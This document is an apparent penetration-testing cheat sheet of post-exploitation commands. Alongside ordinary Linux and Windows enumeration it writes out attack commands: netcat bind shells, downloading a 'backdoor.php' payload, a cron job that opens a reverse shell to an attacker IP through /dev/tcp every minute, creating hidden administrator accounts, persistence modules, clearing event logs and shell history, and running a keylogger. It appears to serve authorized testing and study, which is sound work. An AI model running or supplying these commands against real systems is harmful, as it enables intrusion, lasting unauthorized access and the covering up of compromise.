Post-Exploitation & Commands

Useful Commands

Linux

ctrl + c # terminate the currently running command
ctrl + r # search the current terminal session’s command history
ctrl + a # go to the start of line
ctrl + e # go the the end of line
ctrl + z # sleep program

# Encode file to Base64
base64 -w 0 file.txt
# Count Lines
wc -l <file>
# Count Chars
wc -c
# Sort and delete duplicates
cat file | sort | uniq 
# Replace string inside a file
sed -i 's/OLD/NEW/g' file.txt

# Decompress
7z -x file.7z                # .7z
bzip2 -d file.bz2            # .bz2
gunzip file.gz               # .gz
tar -xvzf file.tar.gz        # .tar.gz
tar -jxf file.tar.bz2        # .tar.bz2
tar -xvjf file.tbz           # .tbz
tar -xvzf file.tgz           # .tgz
unzip file.zip               # .zip
unxz file.xz                 # .xz            (apt install xz-utils)

# Clipboard
xclip -sel c < file.txt

# Search strings inside files
grep -ri password # search password (case insensitive) in all subdirectory
grep -Ei 'pass|user' file.txt # search pass or user strings in file.txt
grep -Eri 'pass|user' # search pass or user strings in all subdirectory
# with color, ignore binaries (-I), print line number (-n) and redirect errors
grep --color=auto -rn -iIE "PASSW|PWD" 2>/dev/null

# Change user: root
su
# Change Linux user password (Copy output and past it in /etc/shadow)
openssl passwd -1 -salt <salt> <new_pass> # -1 means weakest algorithm, -6 means strongest

Enumeration

# System info
# Print linux distro version
cat /etc/os-release
cat /etc/issue
lsb_release -a
# Print certain system information.
uname -a 
# Print environment variables
env 
# hardware info
lscpu
# RAM usage
free -h
# disk usage
df -h
# list packages installed with version
dpkg -l

# Enumerate Users
whoami
groups <user>
# Creates a user
useradd -m <user> -s /bin/bash
# Add bob to root group
usermod -aG root <user>
# ssh session enumerate
lastlog
# log of users logged in
last

# Enumerate Network
ip a # Useful also to discover other network
# display hostname
cat /etc/hostname
# maps IP addresses to domain (Useful to discover internal domain you can access)
cat /etc/hosts
# display the domain name server (Many times it is the default gateway)
cat /etc/resolv.conf

# Display the network connections
netstat -tulpn
# Display the host ARP cache
arp -a
# View and modify the routing table
route # Note: gateway is important... it can be a DNS server, DHCP server or all in one

# Processes & services
ps aux # Display all process. It use windows size (truncation)
ps auxw # Use 132 columns to display info, instead of the window size.
ps auxww # ps will use as many columns as necessary.
ps aux | grep root # Useful for privesc
top # dynamic real-time view of a running system (like task manager)
# display cronjob for the root user
crontab -l
# display all file that contains cronjob
ls -al /etc/cron*
# display the contents of all cronjob files
cat /etc/cron*

Windows

:: System info
systeminfo
:: Get current user
whoami  
:: Get current user privileges
whoami /priv
:: Get installed updates. Useful to see security patch
wmic qfe get Caption,HotFixID,InstalledOn,Description 
:: Adds, displays, or modifies local groups
net localgroup
:: Get group membership of user -> net localgroup administrators
net localgroup <group>
:: Get user info
net user <user>

:: Network Info
ipconfig /all
:: lists info on tcp/udp ports
netstat -ano
:: shows f/w status
netsh advfirewall show allprofiles
:: display arp table (arp cache to discover other IP addresses on the target network)
arp -a
:: print route table (useful during the pivoting phase of post-exploitation as it can reveal network routes)
route print

:: Processes & Services
:: lists services running
net start
:: same as above with extra details like pid, active state, etc.
wmic service list brief
:: stop a service
net stop <servicename>
:: list process with respecive services
tasklist /svc 
:: list scheduled tasks
schtasks /query /fo list /v
:: Automation : JAWS - https://github.com/411Hall/JAWS
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

:: Change Windows user password
net user <username> <new_pass>

Bind Shell

This type of shell is not preferred as the attacker directly connects to the target system and in most cases, ingress traffic is always blocked or flagged as suspicious.

# Windows (target)
nc -nvlp <target_port> -e cmd.exe 
nc.exe -nvlp <target_port> -e cmd.exe

# Linux (target)
nc -nvlp <target_port> -e /bin/bash

# Linux (attacker)
nc -nv <target_ip> <target_port>

# Windows (attacker)
nc.exe -nv <target_ip> <target_port>


# Linux Metasploit (attacker)
use multi/handler
set payload generic/shell_bind_tcp # Try also "linux/x64/shell/bind_tcp" or "linux/x64/shell_bind_tcp"
set rhost <target_ip>
set lport <target_port>
run

Transfer files

# HTTP Windows
certutil -urlcache -f http://<host>/backdoor.php backdoor.php
# HTTP Linux
wget http://<host>/backdoor.php

# Netcat [useful when the victim cannot reach you, but you can]
nc -nvlp <target_port> > backdoor.php         # [recepient]
nc -w 3 <ip> <target_port> < backdoor.php    # [sender]

# TIPS
# 1 tip - Progress Indicator in netcat
pv backdoor.php | nc -w 3 <ip> <target_port> # [sender] (install pv)
# 2 tip - Check md5
md5sum backdoor.php

# Note: netcat "-n" option means no DNS (only IP)

[Fully] interactive shell

Interactive shell

/bin/bash -i # Linux

Fully interactive shell

# 1 Step
python3 -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'

# 2 Step
CTRL + Z # Press CTRL + Z to background process and get back to your host machine

# 3 Step
stty raw -echo; fg

# 4 Step
export TERM=xterm

Pivoting & Port forwarding

  • Metasploit (in meterpreter)

    • ipconfig find subnet (the host may be in other network)

    • run autoroute -s <subnet> (subnet of the internal network). This means anytime we want to contact a machine within one of the networks specified, we will go through meterpreter session and use that to connect to the targets.

      • Example:

        • ipconfig IP 19.9.29.148. Netmask: 255.255.240.0

        • run autoroute -s 10.10.0.29.0/20

    • run autoroute -p Displays active routing table.

    • auxiliary/scanner/portscan/tcp : We can perform the scan. NOTE: scanning with metasploite is limited (we can't discover software version etc...) so it's better to use nmap. To do that we need to perform port forwarding.

    • since target_sys_2 does not have a route back to attacker_sys, use bind_shell payload : windows/meterpreter/bind_tcp

  • Port forwarding (meterpreter/metasploit)

    • portfwd add -l 1234 -p 80 -r <target_sys_2_ip> Forward remote port to local port. In this case we want to scan the port 80 of the target 2

    • portfwd list

    • nmap -sV -sC -p 1234 localhost

Persistence

Windows

  • Metasploit

    • search persistence module (Windows)

    • Ex: exploit/windows/local/persistence_service

      • It will generate and upload an executable to a remote host, next will make it a persistent service. It will create a new service which will start the payload whenever the service is running. Admin or system privilege is required.

      • When you want to connect again you need to set a listener to receive the connection

  • Enable RDP

    • with metasploit : search enable_rdp (and set session)

      • Connect to victim from attacker

        • Note: you need username and password, if you don't have the password, change it net user <username> <new_pass> (suspicious in a real environment) or crack NTLM...

        • Note 2: you can create a new account and add it to administrator group...

    • second way with metasploit/meterpreter (auto create account and settings):

      • In meterpreter run getgui -e -u user_you_want -p password_you_want

        • enables rdp service -> creates new user with the provided parameters -> hides user from windows login screen -> adds user to Remote Desktop Users and Administrators group.

Linux

  • Metasploit

    • search persistence module (Linux)

      • Example: post/linux/manage/sshkey_persistence (needed elevated privs - This module will add an SSH key to a specified user)

  • Via SSH key

    • After gaining access to linux system, you can transfer SSH private key to local machine and use it to connect via SSH

  • With cron jobs

    • Set up listener

    • echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1'" > cron create a cronjob (every minute time format)

    • crontab -i cron

    • crontab -l crontab for the current user

    • NOTE: if the command doesn't work try with another one... revshell

Clearing tracks

Windows

# Metasploit/Meterpreter
clearev  # clear the Application, System, and Security logs on a Windows system

Linux

history -c                          # clear history
cat /dev/null > ~/.bash_history     # same as above

Keylogger

# With metasploit
keyscan_start          # start keylogger
keyscan_dump print     # captured strokes

Last updated